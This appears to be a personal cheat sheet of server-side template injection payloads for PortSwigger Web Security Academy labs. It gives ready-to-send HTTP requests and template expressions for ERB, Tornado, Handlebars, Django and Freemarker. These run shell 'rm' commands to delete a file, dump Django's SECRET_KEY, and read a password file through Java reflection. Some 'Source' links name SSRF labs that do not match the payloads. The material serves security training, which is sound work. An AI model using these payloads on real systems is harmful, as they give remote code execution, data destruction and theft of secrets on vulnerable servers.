[[$Polygloth Detection]] [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md?ref=sec.stealthcopter.com) ##### Server-Side Template Injection (ERB) – delete file via `system()` ```http GET /?message=<%25+system("rm+/home/carlos/morale.txt")+%25> HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net ``` Context: The `message` parameter is rendered unsanitized in an ERB template, allowing arbitrary Ruby code execution via `<%= ... %>` syntax. Here, `system("rm /home/carlos/morale.txt")` removes the target file. Encoding: URL-encoded ERB delimiters (`<%` → `%25`, `%>` → `%25`) Source: [[1. Basic SSRF against the local server]] ----- ##### SSTI in Tornado (code context) – delete file via `os.system()` ```http POST /my-account/change-blog-post-author-display HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net Content-Type: application/x-www-form-urlencoded blog-post-author-display=user.name}}{%25+import+os+%25}{{os.system('rm%20/home/carlos/morale.txt') ``` Context: The `blog-post-author-display` value is rendered inside Tornado’s template logic (`{% … %}`) and expression (`{{ … }}`) blocks without sanitization. By escaping the original expression (`user.name}}`), importing the `os` module in a logic block (`{% import os %}`) and then invoking `os.system()` in an expression block, arbitrary OS commands are executed. Encoding: URL-encoded control delimiters (`%25` for `{%` and `%}`), spaces as `+`, path spaces as `%20` Source: [[2. Basic SSRF against another back-end system]] --- ##### SSTI in unknown template engine (Handlebars) – delete file via documented exploit ```http GET /?message=wrtz%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0d%0a%20%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0d%0a%20%20%20%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%65%61%63%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%20%20%7b%7b%2f%77%69%74%68%7d%7d%0d%0a%7b%7b%2f%77%69%74%68%7d%7d HTTP/1.1 Host: YOUR-LAB-ID.web-security-academy.net ``` Context: The `message` parameter is rendered with Handlebars. By leveraging the documented @Zombiehelp54 exploit, you instantiate functions via prototype manipulation and call `require('child_process').exec('rm /home/carlos/morale.txt')`, deleting the target file. Encoding: URL encoding of Handlebars control characters and line breaks Source: [[4. Server-side template injection in an unknown language with a documented exploit]] --- ##### Server-side template injection in Django – disclose `SECRET_KEY` via `settings` ```django {{ settings.SECRET_KEY }} ``` Context: The product description template is rendered with a Django context that includes the `settings` object. After confirming the engine using `{% debug %}`, injecting `{{ settings.SECRET_KEY }}` outputs the framework’s secret key. Encoding: None Source: [[5. Server-side template injection with information disclosure via user-supplied objects]] --- ##### SSTI in Freemarker sandbox – read file via method chain ```freemarker ${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('/home/carlos/my_password.txt').toURL().openStream().readAllBytes()?join(" ")} ``` Context: The `product` object is exposed in a Freemarker template protected by a weak sandbox. By chaining Java reflection and I/O methods—getting the class’s protection domain, resolving the target file URI, opening its stream, reading all bytes, and joining them as a string—you can dump the contents of `my_password.txt` from Carlos’s home directory. Encoding: None Source: [[6. Server-side template injection in a sandboxed environment]] ---